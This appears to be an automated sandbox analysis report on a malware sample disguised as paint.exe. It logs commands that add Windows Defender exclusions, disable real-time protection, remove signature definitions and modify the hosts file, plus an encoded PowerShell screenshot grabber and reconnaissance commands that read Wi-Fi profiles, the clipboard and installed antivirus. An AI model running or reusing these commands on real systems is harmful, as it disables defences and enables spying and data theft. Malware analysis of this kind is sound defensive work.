Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f2vmusrvc
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: getmac.exe, 0000003A.00000003.1802790638.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003A.00000002.1805502714.00000233D78E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: entControlSet\Services\Hyper-V\Linkage"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF6F0BDD19C

Source: C:\Users\user\Desktop\paint.exe

Code function: 1_2_00007FFDFB029060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

1_2_00007FFDFB029060

Source: C:\Users\user\Desktop\paint.exe

Code function: 0_2_00007FF6F0BF34F0 GetProcessHeap,

0_2_00007FF6F0BF34F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6F0BDD19C
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDD37C SetUnhandledExceptionFilter,	0_2_00007FF6F0BDD37C
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF6F0BEA684
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF6F0BDC910
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6F0BDD19C
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDD37C SetUnhandledExceptionFilter,	1_2_00007FF6F0BDD37C
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF6F0BEA684
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF6F0BDC910
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FFDFAA03028 IsProcessorFeaturePresent,00007FFE1A461A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE1A461A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FFDFAA03028
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	88_2_00007FF623E2B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2B6D8 SetUnhandledExceptionFilter,	88_2_00007FF623E2B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	88_2_00007FF623E2A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E34C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	88_2_00007FF623E34C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\paint.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
